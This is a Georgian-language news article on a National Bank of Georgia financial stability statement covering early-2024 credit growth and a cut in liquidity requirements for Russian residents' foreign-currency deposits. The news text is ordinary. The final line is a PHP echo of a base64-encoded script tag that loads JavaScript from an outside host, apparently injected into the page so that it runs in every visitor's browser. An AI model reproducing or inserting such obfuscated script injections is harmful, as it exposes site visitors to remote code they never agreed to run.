celsiusi
ავერსი საქკაბელი

 საქართველოს ფინანსური სისტემა მდგრადობას ინარჩუნებს და ეკონომიკის დაკრედიტებას განაგრძობს, – ინფორმაციას ეროვნული ბანკი ავრცელებს.

სებ-ის ცნობით, 2024 წლის იანვრის მონაცემებით, ბანკები კაპიტალისა და ლიკვიდობის ჯანსაღ მაჩვენებლებს ინარჩუნებენ. საკრედიტო აქტივობა მდგრად დონეზეა.

„2024 წლის იანვარში სესხების წლიურმა ზრდამ, წინასწარი შეფასებით, გაცვლით კურსის ეფექტის გამორიცხვით, 15.8% შეადგინა, რაც, მნიშვნელოვანწილად, ბიზნესსესხების ზრდით არის განპირობებული. 2023 წლის მეოთხე კვარტალის მონაცემებით, სესხების მთლიან შიდა პროდუქტთან ფარდობა გრძელვადიან ტრენდს ეტაპობრივად უახლოვდება. გასული წლის დასაწყისთან შედარებით, სესხების მშპ-თან ფარდობის უარყოფითი გაპი მნიშვნელოვნად შემცირებულია, რაც მაღალი ეკონომიკური ზრდის ნორმალიზებისა და მდგრადი საკრედიტო აქტივობის ასახვაა. კომიტეტის შეფასებით, საკრედიტო აქტივობისა და ეკონომიკური ზრდის არსებული ტენდენციის შენარჩუნების შემთხვევაში, მოსალოდნელია, რომ სესხების მშპ-თან ფარდობა მის გრძელვადიან ტრენდს 2024 წელის პირველ ნახევარში დაუახლოვდება. შესაბამისად, მიმდინარე ეტაპზე კაპიტალის კონტრციკლური ბუფერის ციკლური კომპონენტის ცვლილების საჭიროება არ იკვეთება.

კომიტეტმა არარეზიდენტების უცხოური ვალუტის დეპოზიტებზე ლიკვიდობის მოთხოვნის რეკალიბრაციის გადაწყვეტილება მიიღო. არარეზიდენტი ფიზიკური და იურიდიული პირების მიერ განთავსებული დეპოზიტები, რეზიდენტებთან შედარებით, ნაკლებად სტაბილური ხასიათით გამოირჩევა. შესაბამისად, ეროვნული ბანკს მსგავსი დეპოზიტებისათვის ლიკვიდობის უფრო მაღალი მოთხოვნა აქვს დაწესებული. გასულ წელს, საქართველოში რუსეთის რეზიდენტების მიერ უცხოურ ვალუტაში განთავსებული დეპოზიტების ჭარბი ზრდიდან მომდინარე რისკების შერბილების მიზნით, ლიკვიდობის მოთხოვნა (გადინების განაკვეთი) 80%-მდე გაზარდა.

ნიშანდობლივია, რომ მას შემდეგ რუსეთის რეზიდენტების ანგარიშებისა და ანაბრების მოცულობა დასტაბილურდა, ხოლო წილი მთლიან დეპოზიტებში შემცირებულია. ასევე, ამ რესურსის ძირითად ნაწილს ბანკები ლიკვიდურ აქტივებში ინარჩუნებენ და არ ხდება გრძელვადიანი სტაბილური ვალდებულებების ჩანაცვლება. ცალკეული შეფასებებით და გეოპოლიტიკური ვითარების გათვალისწინებით, საშუალოვადიან პერიოდში აღნიშნული ანაბრების მყისიერი გადინება ნაკლებად მოსალოდნელია. შესაბამისად, ფინანსური სტაბილურობის კომიტეტმა რუსეთის რეზიდენტების უცხოურ ვალუტაში განთავსებული დეპოზიტებისათვის ლიკვიდობის მოთხოვნის სხვა არარეზიდენტი დეპოზიტების ლიკვიდობის მოთხოვნის თანაზომიერად (საშუალოდ, 40%) დაწესების გადაწყვეტილება მიიღო. ამასთან, ბანკებს ეძლევათ რეკომენდაცია, აწარმოონ არარეზიდენტების ანაბრების კომპოზიციის რეგულარული ანალიზი და საჭიროების შემთხვევაში შეარბილონ რისკები ლიკვიდობის ადეკვატური შიდა ბუფერით.

საქართველოს ეროვნული ბანკი განაგრძობს ქვეყნის ფინანსური სტაბილურობის მუდმივ მონიტორინგს, საშინაო და საგარეო რისკების შეფასებას და შესაძლო რისკების მინიმიზაციისთვის თავის ხელთ არსებულ ყველა ინსტრუმენტს საჭიროებისამებრ გამოიყენებს“, – აღნიშნულია ინფორმაციაში.

ეროვნული ბანკის ინფორმაციით, ფინანსური სტაბილურობის კომიტეტის მორიგი სხდომა 2024 წლის 29 მაისს გაიმართება.

335
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");